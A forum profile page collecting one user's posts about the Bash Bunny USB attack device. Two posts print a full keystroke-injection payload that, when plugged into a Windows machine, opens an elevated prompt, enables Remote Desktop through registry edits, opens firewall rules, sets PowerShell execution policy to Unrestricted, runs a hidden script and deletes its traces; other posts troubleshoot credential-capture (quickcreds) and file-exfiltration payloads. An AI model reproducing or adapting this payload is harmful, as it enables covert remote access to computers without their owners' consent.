Jump to content

Sohrce

Active Members
  • Content Count

    7
  • Joined

  • Last visited

About Sohrce

  • Rank
    Newbie

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. LED R ATTACKMODE HID Q DELAY 750 Q GUI r Q DELAY 1000 QUACK STRING powershell Start-Process notepad -Verb runAs Q ENTER Q DELAY 750 Q ALT y Q DELAY 750 Q ENTER Q ALT Q SPACE Q DELAY 1000 QUACK STRING m Q DELAY 1000 QUACK DOWNARROW REPEAT 100 Q ENTER LED G B 100 QUACK STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0 Q ENTER QUACK STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 1 Q ENTER Quack STRING netsh advfirewall firewall set rule group='remote desktop - remotefx' new enable=Yes Q ENTER QUACK STRING netsh advfirewall firewall set rule group='remote desktop' new enable=Yes Q ENTER QUACK STRING Remove-Item $MyINvocation.InvocationName Q ENTER Q CTRL s Q DELAY 1000
  2. I downloaded the Enable RDP duckycode from the Duck Tool Kit example payloads and wanted to modify it to work on the Bash Bunny. I added a Q in front of evreything except for the strings i added Quack. Will this work and is there a difference between Quack and Q. LED R ATTACKMODE HID Q DELAY 750 Q GUI r Q DELAY 1000 QUACK STRING powershell Start-Process notepad -Verb runAs Q ENTER Q DELAY 750 Q ALT y Q DELAY 750 Q ENTER Q ALT Q SPACE Q DELAY 1000 QUACK STRING m Q DELAY 1000 QUACK DOWNARROW REPEAT 100 Q ENTER LED G B 100 QUACK STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0 Q ENTER QUACK STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 1 ENTER STRING netsh advfirewall firewall set rule group='remote desktop - remotefx' new enable=Yes Q ENTER QUACK STRING netsh advfirewall firewall set rule group='remote desktop' new enable=Yes Q ENTER QUACK STRING Remove-Item $MyINvocation.InvocationName Q ENTER Q CTRL s Q DELAY 1000 LED R B QUACK STRING C:\Windows\config-40970.ps1 Q ENTER Q DELAY 1000 Q ALT F4 Q DELAY 750 Q GUI r Q DELAY 750 QUACK STRING powershell Start-Process cmd -Verb runAs Q ENTER Q DELAY 750 Q ALT y Q DELAY 1000 QUACK STRING mode con:cols=14 lines=1 Q ENTER Q ALT SPACE Q DELAY 750 QUACK STRING m Q DELAY 750 QUACK DOWNARROW REPEAT 100 Q ENTER QUACK STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false Q ENTER Q DELAY 750 QUACK STRING powershell.exe -windowstyle hidden -File C:\Windows\config-40970.ps1 Q ENTER LED G
  3. Thanks for replying, I eventually switched the USB port and it began working again Now all the ports work I have no clue what could have happened but it may have been a overheating issue
  4. After running quickcreds on a windows 7 computer different from the one i installed erveything on the bash bunny for and switching back to original computer, the bash bunny is not showing any LED's I tried switching modes but it still does not working in arming or not Because of this I do not believe i can run recovery mode Any tips?
  5. Sohrce

    Install Tools

    did you replace TOOLSDIR=$(find /root/udisk/payloads/ -name tools_to_install) with mount -o sync /dev/nandf /root/udisk or did you just add it after it?
  6. While in arming mode, the loot folder created itself and ran the usb_exfiltrator in switch 1.
  7. After running the usb_exfiltrator in switch 1 I get a windows error message when trying to open the loot file in arming mode and both switches. When running the usb_exfiltrator i got a red LED and then Green LED and after looking through the files while still in switch one, the files seemed to be finished downloading so i unplugged the bash bunny. Now i cannot open the lott folder and get a windows popup that says there is a problem with this drive. Should I run the windows recovery or is there a bash bunny recovery?
×
×
  • Create New...